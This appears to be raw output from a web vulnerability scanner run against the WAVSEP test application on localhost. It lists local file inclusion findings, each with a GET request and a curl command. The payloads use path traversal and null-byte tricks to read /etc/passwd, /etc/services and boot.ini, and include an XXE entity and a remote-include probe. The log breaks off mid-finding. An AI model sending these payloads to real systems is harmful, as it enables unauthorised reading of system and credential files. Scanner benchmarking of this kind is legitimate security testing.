curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.aspx"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.css HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.css"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00pix.gif HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00pix.gif"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.htm HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.htm"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.html HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.html"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.php HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.php"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.asp HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.asp"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.aspx HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.aspx"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.css HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.css"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00pix.gix HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00pix.gix"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2Fc%3A%2Fboot.ini%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2Fc%3A%2Fboot.ini%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=.depdb HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=.depdb"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=.depdb%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=.depdb%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=pearcmd.php HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=pearcmd.php"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=pearcmd.php%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=pearcmd.php%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
